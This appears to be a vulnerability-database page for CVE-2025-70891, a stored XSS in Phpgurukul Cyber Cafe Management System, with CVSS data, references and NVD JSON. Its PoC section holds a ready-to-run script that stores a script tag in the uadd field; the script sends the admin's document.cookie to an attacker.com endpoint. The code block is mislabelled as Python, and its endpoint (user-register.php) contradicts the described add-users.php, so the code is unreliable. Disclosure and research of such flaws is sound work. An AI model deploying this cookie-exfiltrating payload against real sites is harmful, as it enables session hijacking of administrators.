CVE-2025-70891

Description

A stored cross-site scripting (XSS) vulnerability exists in Phpgurukul Cyber Cafe Management System v1.0 within the user management module. The application does not properly sanitize or encode user-supplied input submitted via the uadd parameter in the add-users.php endpoint. An authenticated attacker can inject arbitrary JavaScript code that is persistently stored in the database. The malicious payload is triggered when a privileged user clicks the View button on the view-allusers.php page.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Phpgurukul Cyber Cafe Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-70891 Stored XSS PoC // Target: Phpgurukul Cyber Cafe Management System v1.0 // Endpoint: add-users.php (uadd parameter) const axios = require('axios'); const qs = require('querystring'); async function exploit(targetUrl, sessionCookie) { const addUserEndpoint = `${targetUrl}/admin/user-register.php`; const viewUsersEndpoint = `${targetUrl}/admin/view-allusers.php`; // Malicious XSS payload const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; // Step 1: Add user with XSS payload in uadd parameter const addUserData = { username: 'testuser' + Date.now(), email: '[email protected]', mobile: '1234567890', uadd: xssPayload, // XSS injection point password: 'password123', submit: 'submit' }; try { // Send request to add user with malicious address await axios.post(addUserEndpoint, qs.stringify(addUserData), { headers: { 'Cookie': sessionCookie, 'Content-Type': 'application/x-www-form-urlencoded' } }); console.log('[+] User added with XSS payload'); console.log('[+] Payload stored in database'); console.log('[+] Waiting for admin to view user list...'); // Step 2: When admin visits view-allusers.php and clicks View, // the XSS payload will be executed } catch (error) { console.error('[-] Exploitation failed:', error.message); } } // Usage // exploit('http://target.com', 'PHPSESSID=your_session_cookie'); // Manual PoC: // 1. Login to the application // 2. Navigate to user registration (add-users.php) // 3. Enter XSS payload in address field (uadd parameter): <script>alert(document.cookie)</script> // 4. Submit the form // 5. When admin views user list and clicks View, XSS executes

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-70891
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-70891
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-70891/
[4] VulDB https://vuldb.com/cve/CVE-2025-70891
[5] https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70891
[6] https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-70891", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:04.903", "lastModified": "2026-01-22T16:01:16.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting (XSS) vulnerability exists in Phpgurukul Cyber Cafe Management System v1.0 within the user management module. The application does not properly sanitize or encode user-supplied input submitted via the uadd parameter in the add-users.php endpoint. An authenticated attacker can inject arbitrary JavaScript code that is persistently stored in the database. The malicious payload is triggered when a privileged user clicks the View button on the view-allusers.php page."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) almacenado existe en Phpgurukul Cyber Cafe Management System v1.0 dentro del módulo de gestión de usuarios. La aplicación no sanitiza o codifica adecuadamente la entrada proporcionada por el usuario enviada a través del parámetro uadd en el endpoint add-users.php. Un atacante autenticado puede inyectar código JavaScript arbitrario que se almacena persistentemente en la base de datos. La carga útil maliciosa se activa cuando un usuario privilegiado hace clic en el botón 'View' en la página view-allusers.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "076A2810-A876-4B7D-B728-BCCE977A7225"}]}]}], "references": [{"url": "https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70891", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql", "source": "[email protected]", "tags": ["Product"]}]}}